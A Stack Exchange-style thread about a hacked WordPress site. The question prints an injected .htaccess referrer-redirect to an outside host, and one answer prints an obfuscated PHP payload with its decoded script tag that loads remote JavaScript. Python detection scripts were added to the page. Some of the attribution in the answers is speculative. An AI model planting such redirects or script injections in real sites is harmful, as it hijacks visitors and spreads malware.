8

My website was banned as a malware website by Google. When I checked the code, I found out that some code had been injected into many files on my server. I cleaned everything manually, editing all files on my server (shared hosting) after searching all the files for some code from the injected code. Even the .htaccess file was modified by the attacker.

There were two WordPress installations on the website, in two different subfolders of the website root, which were not updated. I updated both.

Then Google removed the ban on my website.

Yesterday, I found out that the .htaccess file on my website was again modified by the attacker. Here is the code:

#b58b6f#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://www.couchtarts.com/media.php [R=301,L]
</IfModule>
#/b58b6f#

I searched for "b58b6f" in all the files, but I don't find any. I think this is the only file modified by the most recent attack. I deleted this .htaccess file, as I don't need it.

How was the hacker able to hack my website? How can I prevent this from happening again? How can I make my website more secure?

Simon
Debiprasad
  • Do you have your website in subversion (or similar)? An hourly `svn status` cron job can alert you very quickly to *any* changes and a manual `svn revert` can remove all the changes. – Ladadadada Jun 22 '12 at 09:17
  • I think this answer might apply to your situation. http://security.stackexchange.com/questions/16305/determining-the-point-of-compromise-on-an-infected-web-server/16322#16322 – Todd Dill Jun 24 '12 at 13:22
  • "malware injection" is just a symptom of insecure code. An attacker needs a vulnerability such as SQL Injection or a Local File Include vulnerability in order to make this happen. – rook Jul 10 '13 at 16:36
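The change-detection idea in the comment above (an hourly job that reports any modified file) works without subversion as well: hash the web root once while it is clean, then compare on a schedule. The script below is an added example written for this page, not code from the thread or from WordPress. The directory layout, file names, marker id 1a2b3c and the .invalid hostname in the demo are constructed; in real use the baseline file belongs outside the web root and ideally off the host, because an attacker who holds the FTP credentials can edit it too.

```python
import hashlib
import json
import os
import tempfile


def hash_file(path):
    """SHA-256 of one file, read in chunks so large uploads do not fill memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root):
    """Map relative path -> digest for every regular file under root. Dotfiles
    such as .htaccess are deliberately included: that is the file that was
    rewritten in this thread. Symlinks are skipped so a link cannot stand in
    for content."""
    baseline = {}
    for dirpath, _dirs, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            if os.path.islink(full):
                continue
            baseline[os.path.relpath(full, root)] = hash_file(full)
    return baseline


def save_baseline(baseline, path):
    with open(path, "w") as f:
        json.dump(baseline, f, indent=1, sort_keys=True)


def load_baseline(path):
    with open(path) as f:
        return json.load(f)


def compare(baseline, current):
    """Sorted lists of files that appeared, vanished, or changed content."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in baseline
                           if p in current and baseline[p] != current[p]),
    }


def check(root, baseline_path):
    """The cron-side call: compare the live tree against the saved baseline."""
    return compare(load_baseline(baseline_path), build_baseline(root))


def demo():
    """Constructed scenario: a clean tree is baselined, then .htaccess gains a
    redirect block and a new PHP file appears under wp-content."""
    with tempfile.TemporaryDirectory() as root, tempfile.TemporaryDirectory() as store:
        os.makedirs(os.path.join(root, "blog", "wp-content"))
        files = {
            "index.php": "<?php echo 'hello'; ?>\n",
            ".htaccess": "RewriteEngine On\n",
            os.path.join("blog", "wp-settings.php"): "<?php // constructed stand-in ?>\n",
        }
        for rel, body in files.items():
            with open(os.path.join(root, rel), "w") as f:
                f.write(body)
        baseline_path = os.path.join(store, "baseline.json")  # kept outside the web root
        save_baseline(build_baseline(root), baseline_path)

        # Simulated tampering after the baseline was taken (constructed content).
        with open(os.path.join(root, ".htaccess"), "a") as f:
            f.write("#1a2b3c#\nRewriteRule ^(.*)$ http://redirect-target.invalid/ [R=301,L]\n#/1a2b3c#\n")
        with open(os.path.join(root, "blog", "wp-content", "x7.php"), "w") as f:
            f.write("<?php /* constructed stand-in for a dropped file */ ?>\n")
        return check(root, baseline_path)


if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```

To use it on a real site, call `save_baseline(build_baseline(root), path)` once on a tree you have just cleaned and updated, and run `check(root, path)` from cron; re-baseline after every deliberate deploy. Any entry under `modified` or `added` at a time when nobody deployed is the cue to pull the FTP and web server logs for that window, which is also where the point of compromise asked about in the question is most likely to show up.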

3 Answers

7

It seems that the malware you encountered is the "daysofyorr.com virus" or MW:HTA:7.

I suspect that you use FileZilla as your FTP client. If so, you must know that FileZilla stores the credentials of your websites in plain text. A virus may have accessed your credentials, and then accessed all your registered websites searching for WordPress installs in order to update the files by inserting this code.

Now, you should:

  • Search your computer for any viruses, malware, etc.
  • Change the FTP password of all your registered FTP accounts saved in FileZilla
  • Eventually use a better FTP system, like WinSCP

A late comment, but I suspect that you use FileZilla as your FTP client. Did you know that FileZilla stores your FTP site credentials (site/user/pass) in a plain text file in the %APPDATA% folder?

And I also suspect there is a hidden malware on your computer. It grabbed your FileZilla credential files, and used them to change your header.php file in your theme folder. In fact, I suspect that you will find changed header.php in all of your themes folders.

And if you are technical enough to look at your FTP log files, you will find the access to those files: a download, then an upload of the changed files. You might also find some random file names that were uploaded to your root ('home') folder, although those files were deleted by the hacker.

And, you will find that the IP address in the FTP log of the hacker was from China.

Recommendation: uninstall FileZilla, delete the FileZilla folder from %APPDATA% folder, change your FTP passwords (and your host passwords). And look for any changed header.php, footer.php, and wp-settings.php files.

For the "daysofyorr.com virus", you can confirm this by checking some of your PHP files (like index.php) for this code:

#b58b6f#
echo(gzinflate(base64_decode("JctRCoAgDADQq8gO4P5DvcuwRUmhbKPl7fvw98FLWuUaFmwOzmD8GTZ6aSkElZrhNBsborvHnab2Y3aRWPuDwjeTcmwKJeFK5Qc=")));
#/b58b6f#

That's it!

For information, it translates into:

<script type="text/javascript" src="http://www.daysofyorr.com/release.js"></script>

Which seems to lead to a 404 nowadays.

Vilican
Cyril N.
  • Did you confirm it was one of those viruses? I would be curious to know which one :p (I would believe more about MW:HTA:7) – Cyril N. Jun 22 '12 at 09:39
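Both injected artefacts on this page, the marker-delimited .htaccess redirect in the question and the gzinflate(base64_decode(...)) wrapper quoted in this answer, have shapes that are easy to pattern-match, which makes the "search all files" cleanup repeatable. The Python below is an added example for this page, not the thread's code or any WordPress tool: it lists #xxxxxx# marker pairs, decodes a gzinflate/base64 payload (PHP's gzinflate() is raw DEFLATE, so zlib with wbits -15) so you can see what would have been echoed into the page, and flags RewriteRule targets on hosts other than the site's own. The sample index.php and .htaccess contents, the marker 1a2b3c and the .invalid hostnames are constructed for the demo; the answer's own base64 blob is not reused.

```python
import base64
import re
import zlib

# Shapes taken from this thread: a hex marker pair (#b58b6f# ... #/b58b6f#) and an
# echo(gzinflate(base64_decode("..."))) wrapper. The regexes are this example's own.
MARKER_RE = re.compile(r"#([0-9a-f]{6})#.*?#/\1#", re.S)
PAYLOAD_RE = re.compile(
    r"gzinflate\s*\(\s*base64_decode\s*\(\s*[\"']([A-Za-z0-9+/=\s]+)[\"']\s*\)\s*\)"
)
# A RewriteRule whose target is an absolute URL; group 1 is scheme://host.
REWRITE_RE = re.compile(r"^\s*RewriteRule\s+\S+\s+(https?://[^/\s]+)", re.M | re.I)


def decode_gzinflate_b64(blob):
    """Undo base64_decode() then gzinflate(). gzinflate() is raw DEFLATE with no
    zlib header, hence wbits=-15. Whitespace is stripped first because blobs
    that were line-wrapped in a file or a forum post are common."""
    raw = base64.b64decode(re.sub(r"\s+", "", blob))
    return zlib.decompress(raw, -15).decode("utf-8", "replace")


def find_markers(text):
    """Marker ids that delimit injected blocks, e.g. ['b58b6f']."""
    return sorted(set(MARKER_RE.findall(text)))


def scan_php(text):
    """One finding per gzinflate/base64 wrapper, with the payload decoded."""
    findings = []
    for m in PAYLOAD_RE.finditer(text):
        try:
            decoded = decode_gzinflate_b64(m.group(1))
        except (ValueError, zlib.error) as exc:
            decoded = "<undecodable: %s>" % exc
        findings.append({"offset": m.start(), "decoded": decoded})
    return findings


def scan_htaccess(text, own_hosts):
    """Hosts that RewriteRule lines redirect to, excluding the site's own."""
    hosts = [u.split("://", 1)[1].lower() for u in REWRITE_RE.findall(text)]
    return [h for h in hosts if h not in own_hosts]


def make_wrapper(marker, payload_text):
    """Build the same wrapper shape as the quoted index.php around a payload we
    compress ourselves (raw DEFLATE + base64). Used only to produce test input."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    raw = c.compress(payload_text.encode()) + c.flush()
    b64 = base64.b64encode(raw).decode()
    return '#%s#\necho(gzinflate(base64_decode("%s")));\n#/%s#\n' % (marker, b64, marker)


# Constructed samples (hostnames under the reserved .invalid TLD; not the thread's blob).
SAMPLE_TAG = '<script type="text/javascript" src="http://dropper.invalid/release.js"></script>'
SAMPLE_INDEX_PHP = "<?php\n" + make_wrapper("1a2b3c", SAMPLE_TAG) + "require 'wp-blog-header.php';\n"
SAMPLE_HTACCESS = (
    "#1a2b3c#\n<IfModule mod_rewrite.c>\nRewriteEngine On\n"
    "RewriteCond %{HTTP_REFERER} ^.*(google|bing|yahoo)\\.(.*)\n"
    "RewriteRule ^(.*)$ http://redirect-target.invalid/media.php [R=301,L]\n"
    "</IfModule>\n#/1a2b3c#\n"
    "RewriteRule ^old$ https://www.example.com/new [R=301,L]\n"
)

if __name__ == "__main__":
    print("markers:", find_markers(SAMPLE_INDEX_PHP), find_markers(SAMPLE_HTACCESS))
    for f in scan_php(SAMPLE_INDEX_PHP):
        print("payload at", f["offset"], "->", f["decoded"])
    print("off-site redirects:", scan_htaccess(SAMPLE_HTACCESS, {"www.example.com"}))
```

Run `scan_php` over every .php file and `find_markers` plus `scan_htaccess` over every .htaccess in the tree. The marker regex only catches this family of injection, so treat the gzinflate pattern (and eval()/base64_decode() generally) as the broader signal, and treat a referrer-conditioned redirect to a host you do not own as a finding even when no marker is present.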
2
  1. Check logs see if you can work out the point it was compromised
  2. Ensure your WordPress and any plugins are up to date. Since WordPress is such a commonly used system, it's quite prone to vulnerabilities.
  3. If you still can't figure out what's gone on, it might be worth contacting the company that provides your shared hosting and making them aware of the issue, as it could be a result of an out-of-date application or something that they are hosting.
Mark Davidson
1
  1. If your hosting company has their own version of WordPress that they constantly update, I would recommend going with that vs. a fresh install on your own. The probability of getting compromised would be decreased since you would most likely only have access to it via an admin panel.

  2. As for Filezilla, it does support SFTP and FTPS so that may be another option provided that your host supports an encrypted FTP.

  3. Lastly, you may be able to block IP ranges from, say, outside of North America, which could aid in blocking the attacks since most attacks are from overseas, making legal avenues usually not worthwhile to go after.

Brad